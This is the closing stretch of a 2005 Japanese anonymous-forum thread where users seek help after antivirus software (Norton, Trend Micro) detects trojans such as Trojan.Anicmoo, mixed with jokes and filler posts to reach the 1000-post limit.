990 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/03(火) 10:55:09 ]: バスターで感知ｷﾀ━━━━ヽ(｀∀´ )ﾉ━━━━!!!!
その脳豚腐ってるよヽ(´ー｀)ノ
991 名前：988 mailto:sage [2005/05/03(火) 10:56:28 ]: ずっとオフラインです・・・禁止された
992 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/03(火) 10:57:14 ]: >>991
ハメられたんだよ。
何か嫌われることしたんだね。
993 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/03(火) 11:01:43 ]: >>991
ノートン以外の会社のオンラインスキャンをして検出したウイルスの削除方を調べてみる
994 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/03(火) 11:02:30 ]: マルチなような気がしてきた
635 ：名無しさん＠お腹いっぱい。：2005/05/02(月) 22:59:52
友達に貰った手作りゲームのexeをＷクリしたらTrojan Horseってウイルスに
かかりました。問題のファイルは削除したんですがレジストリの改変とかなんとかが
怖いです。いまノートンで完全スキャン中です。help me
995 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/03(火) 11:04:05 ]: とりあえず我々が984のために出来ること、それは･･･

このスレを埋め立ててあげることだな(´∀｀)
996 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/03(火) 11:12:42 ]: 産め
997 名前：639 mailto:sage [2005/05/03(火) 12:05:41 ]: 【OS】 XPサービスパック２
【antivirus】ノートン
【Trojan.Anicmoo】
【症状】今のところなし
【ページを開いたところにリンクが貼ってあり、開いてもいないのにノートンが検出しました。】
【ノートンでスキャンしました。しかし検出しませんでした。】
【検出しなかったので、もう一度感染したページを開いてみました。
同じようにノートンがTrojan.Anicmooを検出しましたが、適用した処理のところに「このファイルを修復できません。」と出てしまいます。
大丈夫なのでしょうか？】
998 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/03(火) 12:10:49 ]: ume
999 名前：名無しさん＠お腹いっぱい。 [2005/05/03(火) 12:40:26 ]: 999
1000 名前：639 mailto:sage [2005/05/03(火) 12:41:47 ]: 1000
1001 名前：１００１ [Over 1000 Thread]: このスレッドは１０００を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

[ 新着レスの取得/表示 (agate) ] / [ 携帯版 ]

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef